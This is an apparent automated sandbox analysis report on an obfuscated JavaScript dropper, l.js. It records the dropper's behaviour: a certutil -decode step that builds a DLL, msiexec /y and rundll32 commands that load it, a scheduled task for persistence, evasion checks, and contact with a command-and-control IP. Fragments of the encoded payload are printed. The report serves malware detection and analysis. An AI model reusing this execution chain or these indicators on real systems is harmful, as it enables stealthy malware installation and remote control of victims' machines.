Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics,11_2_68B85810
Source: l.jsArray : entropy: 5.25, length: 8008, content: 'eEJIQC|JEo''SlQAAkJD|J''f8VIOgAAE|''BIifHo|I1A''.5(\x27T5\x27);t''LDzAAAeZwA''match''AAAAAOiLCw''7A
Source: rad64802.tmp.4.drStatic PE information: real checksum: 0xed95 should be: 0x14d84
Source: Updater.dll.10.drStatic PE information: real checksum: 0xed95 should be: 0x14d84
Source: rad64802.tmp.4.drStatic PE information: section name: .xdata
Source: Updater.dll.10.drStatic PE information: section name: .xdata
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8B4BF push rbp; retf 11_2_68B8B4C0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8B885 push rax; retf 11_2_68B8B886
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8B0C5 push rax; retf 11_2_68B8B0C6
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8C7D9 pushfq ; retf 11_2_68B8C7DB
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8BD02 push rsi; iretd 11_2_68B8BD03
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Whitefusion\Updater.dllJump to dropped file
Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\AppData\Local\Temp\rad64802.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Whitefusion\Updater.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Tasks\Whitefusion.jobJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses certutil -decode
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B85C50 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,wcscmp,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_68B85C50
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-3340
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\ProgramData\Whitefusion\Updater.dllJump to dropped file
Source: C:\Windows\System32\certutil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rad64802.tmpJump to dropped file
Source: C:\Windows\System32\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_11-4206
Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8179E FindFirstFileW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FindNextFileW,wcscmp,FindClose,11_2_68B8179E
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics,11_2_68B85810
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW h
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics,11_2_68B85810
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B857B5 GetProcessHeap,HeapReAlloc,11_2_68B857B5
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B87EB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,11_2_68B87EB0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 149.248.58.85 443Jump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B87DD0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_68B87DD0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B847CE GetVolumeInformationW,GetModuleHandleW,GetModuleHandleW,GetComputerNameW,GetModuleHandleW,GetComputerNameExW,GetModuleHandleW,GetUserNameW,GetModuleHandleW,wcslen,OpenMutexW,GetModuleHandleW,GetTickCount,Sleep,OpenMutexW,CloseHandle,11_2_68B847CE
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B85810 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetSystemInfo,GetSystemMetrics,11_2_68B85810
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information23
Scripting		Valid Accounts2
Scheduled Task/Job		23
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		12
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API		2
Scheduled Task/Job		2
Scheduled Task/Job		11
Process Injection		LSASS Memory11
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Data Encoding		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
System Owner/User Discovery		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials15
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
l.js2%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://149.248.58.85/d0%Avira URL Cloudsafe
https://149.248.58.85/Q0%Avira URL Cloudsafe
https://149.248.58.85/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://149.248.58.85/drundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://149.248.58.85/Qrundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://149.248.58.85/rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
149.248.58.85
unknownUnited States
20473AS-CHOOPAUStrue

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1596998
Start date and time:2025-01-22 20:36:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:l.js
Detection:MAL
Classification:mal72.evad.winJS@8/4@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 11
  • Number of non-executed functions: 27
Cookbook Comments:
  • Found application associated with file extension: .js

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
14:38:56API Interceptor1x Sleep call for process: msiexec.exe modified
19:37:26Task SchedulerRun new task: {65430329-E14B-45C7-815F-1545FB9EBEE9} path: certutil s>-decode radEBB74.tmp rad64802.tmp
19:37:27Task SchedulerRun new task: {D7AC511B-6643-49BE-900E-4E0C51F57196} path: msiexec s>/y C:\Users\user\AppData\Local\Temp\rad64802.tmp

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
149.248.58.85rad59AD5.dllGet hashmaliciousUnknownBrowse
    rad59AD5.dllGet hashmaliciousUnknownBrowse

      Domains

      No context

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AS-CHOOPAUSrad59AD5.dllGet hashmaliciousUnknownBrowse
      • 149.248.58.85
      rad59AD5.dllGet hashmaliciousUnknownBrowse
      • 149.248.58.85
      http://jlolaw.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
      • 137.220.56.63
      ti.co.exeGet hashmaliciousI2PRATBrowse
      • 216.128.184.123
      lolz.exeGet hashmaliciousXmrigBrowse
      • 192.248.189.11
      codes.jsGet hashmaliciousAgentTeslaBrowse
      • 45.63.94.214
      http://rock.levie.com.vnGet hashmaliciousUnknownBrowse
      • 45.63.66.114
      154.213.189.141-x86-2025-01-21T03_19_07.elfGet hashmaliciousMirai, MoobotBrowse
      • 44.169.217.192
      Setup (1).exeGet hashmaliciousUnknownBrowse
      • 207.246.91.177
      https://sjsenersol.ae/clone/houseGet hashmaliciousUnknownBrowse
      • 199.247.13.246

      JA3 Fingerprints

      No context

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\ProgramData\Whitefusion\Updater.dllrad59AD5.dllGet hashmaliciousUnknownBrowse
        rad59AD5.dllGet hashmaliciousUnknownBrowse
          C:\Users\user\AppData\Local\Temp\rad64802.tmprad59AD5.dllGet hashmaliciousUnknownBrowse
            rad59AD5.dllGet hashmaliciousUnknownBrowse

              Created / dropped Files

              C:\ProgramData\Whitefusion\Updater.dll

              Download File
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):54784
              Entropy (8bit):5.985188109464102
              Encrypted:false
              SSDEEP:768:g9QHl5zJLsXpwnPA9KYMGZC7SNichPH/kGFyHxr6a6GPxxoqMo5ydqP+qL3i3:g2dJn7dSfjof2Jo5PM
              MD5:1A28984D6DB3ABDB967C0C19B56F887D
              SHA1:B815A93DEDD5575A77B5FA9C0D77A9BC783CDB27
              SHA-256:B2B67092D3978B0A199C949591BB1872CBC49B91494726A513BE407ABC2CA6A9
              SHA-512:63E255C48E9C36485E6E7BC31319FD407027829713CEF93DD61EDF132949CE3C2DE741A70F6BA90347E3D0AA7112ACC95B71A7405711EAB925F5A491CD5D513F
              Malicious:false
              Joe Sandbox View:
              • Filename: rad59AD5.dll, Detection: malicious, Browse
              • Filename: rad59AD5.dll, Detection: malicious, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........."...!............P..........h.............................p................ .............................................. ...............................`..................................(...................($...............................text...............................`.P`.data...............................@.`..rdata...!......."..................@.`@.pdata..............................@.0@.xdata..............................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....X....@......................@.@..tls.........P......................@.@..reloc.......`......................@.0B........................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\rad64802.tmp

              Download File
              Process:C:\Windows\System32\certutil.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):54784
              Entropy (8bit):5.985188109464102
              Encrypted:false
              SSDEEP:768:g9QHl5zJLsXpwnPA9KYMGZC7SNichPH/kGFyHxr6a6GPxxoqMo5ydqP+qL3i3:g2dJn7dSfjof2Jo5PM
              MD5:1A28984D6DB3ABDB967C0C19B56F887D
              SHA1:B815A93DEDD5575A77B5FA9C0D77A9BC783CDB27
              SHA-256:B2B67092D3978B0A199C949591BB1872CBC49B91494726A513BE407ABC2CA6A9
              SHA-512:63E255C48E9C36485E6E7BC31319FD407027829713CEF93DD61EDF132949CE3C2DE741A70F6BA90347E3D0AA7112ACC95B71A7405711EAB925F5A491CD5D513F
              Malicious:false
              Joe Sandbox View:
              • Filename: rad59AD5.dll, Detection: malicious, Browse
              • Filename: rad59AD5.dll, Detection: malicious, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........."...!............P..........h.............................p................ .............................................. ...............................`..................................(...................($...............................text...............................`.P`.data...............................@.`..rdata...!......."..................@.`@.pdata..............................@.0@.xdata..............................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....X....@......................@.@..tls.........P......................@.@..reloc.......`......................@.0B........................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\radEBB74.tmp

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):73050
              Entropy (8bit):5.011733028274136
              Encrypted:false
              SSDEEP:1536:3Twk8+rj5v4umMEhe3seHLLDiSY2H7Rkqy1w0nIp:3TDrjx4pMHLPi6kqyap
              MD5:76E5A2CAD9CC7F4D716F68BCB952B068
              SHA1:0A249123C5F2C6F49CD7E650323E9EADB19F7E07
              SHA-256:E4E8AD7DA6AEDB908E277C4E5EE733C9E29ACD2268AAF91D1341EEB55B3FB806
              SHA-512:6AD6910D26EFA258FAEEDC03DF2B9DF4F295294BE66A9701C577F107E975D8A00022C89F95F986E1AA85BCFDAD0D8EE6FAAD32E17701CE56B59542642925EE78
              Malicious:false
              Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYLANqSiGEAAAAAAAAAAPAALiILAgIhAIQAAADSAAAADAAAUBMAAAAQAAAAALhoAAAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAABwAQAABAAAle0AAAIAAAAAACAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAABABALgAAAAAIAEAkBAAAAAAAAAAAAAAAOAAAKAFAAAAAAAAAAAAAABgAQD0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgM4AACgAAAAAAAAAAAAAAAAAAAAAAAAAKCQBAIgDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAALiDAAAAEAAAAIQAAAAEAAAAAAAAAAAAAAAAAABgAFBgLmRhdGEAAACwBAAAAKAAAAAGAAAAiAAAAAAAAAAAAAAAAAAAQABgwC5yZGF0YQAAkCEAAACwAAAAIgAAAI4AAAAAAAAAAAAAAAAAAEAAYEAucGRhdGEAAKAFAAAA4AAAAAYAAACwAAAAAAAAAAAAAAAAAABAADBALnhkYXRhAADMBQAAAPAAAAAGAAAAtgAAAAAAAAAAAAAAAAAAQAAwQC5ic3MAAAAAUAsAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAYMAuZWRhdGEAALgAAAAAEAEAAAIAAAC8AAAAAAAAAAAAAAAAAABAADBALmlkYXRhAACQEAAAACABAAASAAAAvgAAAAAAAAAAAAAAAAAAQAAwwC5DUlQAAAAAWAAAAABAAQAAAgAAANAAAAAAAAAAAAAAAAAAAEAA

              C:\Windows\Tasks\Whitefusion.job

              Download File
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):338
              Entropy (8bit):3.5661224775561378
              Encrypted:false
              SSDEEP:6:BID0ka/82On+SkSJkJAWhAlAtWlubhEZykMLNAJDiAjgsW2YRZuy0laMn1:aAkahO+fTWlj0b53LNyuAjzvYRQVaM1
              MD5:BE64DBE6683DD2D86EE6381A3BC11334
              SHA1:930F37A99F1B632681A3134948641ED89A992623
              SHA-256:8E0792206591911D6A8C256699EC6E4E782DAC194F0BCA62E6886547E4365400
              SHA-512:FAA4848F6F92678444DBA13D0862C1DBAA0DA0A03500A458C804589F2A0A707D805FD93C8E7B8204A128C0110CD93527F09641B5DCC70D94AB4D159346223162
              Malicious:false
              Preview:.....D<..|.K.d.....YF. .....<... .....\.......... ....................!.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e...2.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.W.h.i.t.e.f.u.s.i.o.n.\.U.p.d.a.t.e.r...d.l.l.".,.S.t.a.r.t. ./.u.......J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................(.............................

              Static File Info

              General

              File type:ASCII text
              Entropy (8bit):4.80598489458784
              TrID:
                File name:l.js
                File size:764'959 bytes
                MD5:97835729c58cae6501e9b3a3776e9906
                SHA1:63012f62e00a491b83adaba8804d890ac809490a
                SHA256:a75cab3593ad35620817235a9bd7938c7adaa8b3ce12a2da20e3e145ac304346
                SHA512:0ed5d7c90dbb260a732dd990d40a69f0997f8390db0a4cecc18349965e052e13ff8f5ecb709b95b176cc7e3686fbb08775e4b97b2253aa7aef9a1212607e8964
                SSDEEP:12288:q/VoiDR8Cx2ouvoqEZTwXasSNKF+uV6VBEx2:q/Vok2tI+w
                TLSH:C9F45770075218403322DF56EE1DA0E09E29055BBB74A986F98C5B74AFDE4BDDBB0C78
                File Content Preview:function a0_0x174c(_0xe060d2, _0x2b858b) {. var _0x1a48d6 = a0_0x1a48();. return a0_0x174c = function (_0x174c06, _0x33a01f) {. _0x174c06 = _0x174c06 - 0x116;. var _0x2ba6ab = _0x1a48d6[_0x174c06];. return _0x2ba6ab;. }, a0_0

                File Icon

                Icon Hash:68d69b8bb6aa9a86

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2025-01-22T20:37:06.102276+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.450003149.248.58.85443TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 22, 2025 20:38:59.154711008 CET50003443192.168.2.4149.248.58.85
                Jan 22, 2025 20:38:59.154758930 CET44350003149.248.58.85192.168.2.4
                Jan 22, 2025 20:38:59.154926062 CET50003443192.168.2.4149.248.58.85
                Jan 22, 2025 20:38:59.167773008 CET50003443192.168.2.4149.248.58.85
                Jan 22, 2025 20:38:59.167819977 CET44350003149.248.58.85192.168.2.4

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:14:37:03
                Start date:22/01/2025
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js"
                Imagebase:0x7ff72c760000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:14:37:27
                Start date:22/01/2025
                Path:C:\Windows\System32\certutil.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
                Imagebase:0x7ff660b40000
                File size:1'651'712 bytes
                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:5
                Start time:14:37:27
                Start date:22/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:6
                Start time:14:37:27
                Start date:22/01/2025
                Path:C:\Windows\System32\msiexec.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
                Imagebase:0x7ff741380000
                File size:69'632 bytes
                MD5 hash:E5DA170027542E25EDE42FC54C929077
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:14:38:26
                Start date:22/01/2025
                Path:C:\Windows\System32\certutil.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
                Imagebase:0x7ff660b40000
                File size:1'651'712 bytes
                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:9
                Start time:14:38:26
                Start date:22/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:14:38:56
                Start date:22/01/2025
                Path:C:\Windows\System32\msiexec.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
                Imagebase:0x7ff741380000
                File size:69'632 bytes
                MD5 hash:E5DA170027542E25EDE42FC54C929077
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:14:38:58
                Start date:22/01/2025
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u
                Imagebase:0x7ff6c7700000
                File size:71'680 bytes
                MD5 hash:EF3179D498793BF4234F708D3BE28633
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:10.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:23.1%
                  Total number of Nodes:1462
                  Total number of Limit Nodes:35
                  execution_graph 3947 68b889b9 signal 3948 68b88a30 signal 3947->3948 3950 68b888d2 3947->3950 3949 68b888e4 3950->3949 3951 68b889e8 signal 3950->3951 3953 68b88953 signal 3950->3953 3951->3950 3952 68b88a49 signal 3951->3952 3953->3950 3954 68b88a10 signal 3953->3954 3954->3949 4071 68b84afc 4102 68b82ab2 4071->4102 4074 68b81df0 35 API calls 4075 68b84b7a 4074->4075 4076 68b84b87 4075->4076 4127 68b857e2 GetProcessHeap HeapFree 4075->4127 4128 68b857e2 GetProcessHeap HeapFree 4076->4128 4079 68b82e28 30 API calls 4085 68b84a02 4079->4085 4080 68b866cc 2 API calls 4081 68b85098 GetModuleHandleW GetTickCount Sleep 4080->4081 4081->4085 4082 68b81df0 35 API calls 4082->4085 4083 68b86645 GetProcessHeap HeapAlloc 4083->4085 4084 68b866cc GetProcessHeap HeapFree 4084->4085 4085->4079 4085->4080 4085->4081 4085->4082 4085->4083 4085->4084 4086 68b86645 2 API calls 4085->4086 4090 68b857e2 GetProcessHeap HeapFree 4085->4090 4091 68b85188 4085->4091 4097 68b86645 2 API calls 4085->4097 4087 68b85158 OpenMutexW 4086->4087 4087->4085 4088 68b85177 CloseHandle 4087->4088 4089 68b866cc 2 API calls 4088->4089 4089->4091 4090->4085 4129 68b857e2 GetProcessHeap HeapFree 4091->4129 4093 68b85190 4130 68b857e2 GetProcessHeap HeapFree 4093->4130 4095 68b8519a 4096 68b866cc 2 API calls 4095->4096 4098 68b851a4 4096->4098 4099 68b84a90 OpenMutexW 4097->4099 4100 68b866cc 2 API calls 4098->4100 4099->4085 4099->4088 4101 68b851ae 4100->4101 4131 68b82a35 WSAStartup 4102->4131 4104 68b82afa 4105 68b86645 2 API calls 4104->4105 4106 68b82b06 RegOpenKeyExW 4105->4106 4107 68b82c98 4106->4107 4108 68b82b3a 4106->4108 4110 68b86645 2 API calls 4107->4110 4109 68b866cc 2 API calls 4108->4109 4111 68b82b42 GlobalMemoryStatusEx 4109->4111 4121 68b82ca4 4110->4121 4112 68b82b65 4111->4112 4115 68b823de 4 API calls 4112->4115 4113 68b82cff RegEnumKeyExW 4114 68b82d4e RegOpenKeyExW 4113->4114 4113->4121 4117 68b82d81 RegQueryValueExW 4114->4117 4114->4121 4118 68b82b7e 4115->4118 4116 68b866cc 2 API calls 4119 68b82ce9 RegCloseKey 4116->4119 4120 68b82dc8 RegCloseKey 4117->4120 4117->4121 4122 68b82c81 4118->4122 4137 68b85790 GetProcessHeap HeapAlloc 4118->4137 4119->4121 4120->4121 4121->4113 4121->4116 4122->4074 4122->4085 4125 68b82b97 4126 68b82ddb 4125->4126 4138 68b857e2 GetProcessHeap HeapFree 4125->4138 4127->4076 4128->4085 4129->4093 4130->4095 4132 68b82a5f gethostname 4131->4132 4133 68b82a55 4131->4133 4132->4133 4134 68b82a74 gethostbyname 4132->4134 4133->4104 4134->4133 4135 68b82a84 4134->4135 4135->4133 4136 68b82a90 GetModuleHandleW inet_ntoa 4135->4136 4136->4133 4137->4125 4138->4122 4139 68b888fe signal 4140 68b88914 signal 4139->4140 4142 68b888d2 4139->4142 4141 68b888e4 4140->4141 4142->4141 4143 68b889e8 signal 4142->4143 4145 68b88953 signal 4142->4145 4143->4142 4144 68b88a49 signal 4143->4144 4145->4142 4146 68b88a10 signal 4145->4146 